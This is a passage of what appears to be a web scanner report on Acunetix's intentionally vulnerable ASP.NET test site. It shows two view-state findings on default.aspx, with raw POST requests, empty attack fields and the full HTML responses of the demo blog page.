id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:White" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1175 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,175 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8590&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgDATHAPgNsIZGRk5niDsijuK9wOEpB7eBjGt7t7c4M%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLljs6sCQKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCsSa1r135GSX525XiVFGddkOKa1V
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:37:22 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgDATHAPgNsIZGRk5niDsijuK9wOEpB7eBjGt7t7c4M=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLljs6sCQKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCsSa1r135GSX525XiVFGddkOKa1V" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:White" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1185 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,185 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8578&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgDAV3OhdtsIZGRk2N2Z8LuopXG70bfJvg9H58lSi%2F0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLo%2BI2yCgKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCvreQQ%2BBXMxZGBX3CPmX%2Fkc%2FvWsi
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:02:27 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgDAV3OhdtsIZGRk2N2Z8LuopXG70bfJvg9H58lSi/0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLo+I2yCgKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCvreQQ+BXMxZGBX3CPmX/kc/vWsi" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" 